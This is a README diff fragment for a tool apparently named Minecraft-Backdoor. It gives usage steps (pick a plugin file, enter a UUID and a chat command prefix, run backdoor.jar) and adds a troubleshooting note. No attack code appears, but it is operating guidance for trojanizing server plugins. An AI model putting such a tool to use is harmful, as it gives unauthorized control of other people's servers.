Karis-tlg/Minecraft-Backdoor/README.md

 * Select desired plugin file.
 * Input your Minecraft UUID.
 * Input chat command prefix.
 (Default: #)
+## Known Issue
+If you have an issue similar to [Issue 82](https://github.com/ThiccIndustries/Minecraft-Backdoor/issues/82), try placing the backdoor into its own folder, and running from there.
+Do not try to run from the Start Menu.
 ## CLI Usage:
 Java -jar backdoor.jar (filename) [options]
 * --help / -h : Display syntax message in console